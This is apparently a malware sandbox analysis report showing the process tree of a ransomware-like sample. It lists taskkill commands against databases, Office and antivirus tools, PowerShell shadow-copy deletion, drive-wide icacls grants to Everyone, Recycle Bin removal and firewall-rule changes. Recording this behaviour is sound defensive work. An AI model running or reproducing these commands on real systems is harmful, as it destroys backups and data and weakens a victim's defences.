C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes3⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled3⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SstpSvc start= disabled3⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SSDPSRV start= auto3⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config SQLWriter start= disabled3⤵
-
-
C:\Windows\system32\sc.exe"sc.exe" config upnphost start= auto3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM synctime.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM onenote.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM steam.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM outlook.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM infopath.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM excel.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F3⤵
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM visio.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM winword.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\arp.exe"arp" -a3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM ragent.exe /f3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqld.exe /f3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM rmngr.exe /f3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM rphost.exe /f3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM oracle.exe /f3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sql.exe /f3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysql.exe /f3⤵
- Kills process with taskkill
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /f3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM vmwp.exe /f3⤵
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM 1cv8.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }3⤵
-
-
C:\Windows\system32\icacls.exe"icacls" "C:*" /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls" "Z:*" /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls" "D:*" /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /C C:\Windows\TEMP\tmp292F.bat3⤵
-
C:\Windows\system32\mountvol.exemountvol4⤵
-
-
C:\Windows\system32\find.exefind "}\"4⤵
-
-
C:\Windows\system32\mountvol.exemountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-500600000000}\4⤵
-
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.14⤵
- Runs ping.exe
-
-
C:\Windows\system32\mountvol.exemountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-100000000000}\4⤵
-
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.14⤵
- Runs ping.exe
-
-
C:\Windows\system32\mountvol.exemountvol !freedrive!: \\?\Volume{63e50be4-9a0d-11eb-a110-806e6f6e6963}\4⤵
-
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.14⤵
- Runs ping.exe
-
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin3⤵
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c rd /s /q D:\\$Recycle.bin3⤵
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes3⤵
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes3⤵
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes3⤵
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310093\1618038130 /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{CB0836EC-B072-368D-82B2-D3470BF95707}v12.0.40660\packages\vcRuntimeMinimum_amd64\cab1.cab /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\state.rsm /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}v12.0.40660\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\cab1.cab /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Oracle\Java\java.settings.cfg /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-065959-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070122-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070349-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Security Health\Logs\SHS-04102021-070541-3-1-15063.0.amd64fre.rs2_release.170317-1834.bin /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\arp.exe"arp" -a3⤵
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\confident.cov /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\fyi.cov /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\generic.cov /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows NT\MSFax\Common Coverpages\en-US\urgent.cov /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPDetection-04102021-065958.log /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MPLog-04102021-065958.log /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Support\MpWppTracing-04102021-065958-00000003-ffffffff.bin /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"icacls.exe" C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-5C093E9FCD1354685BA9043E2217B5B122F667C4.bin /grant Everyone:F /T /C /Q3⤵
- Modifies file permissions
-
-
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB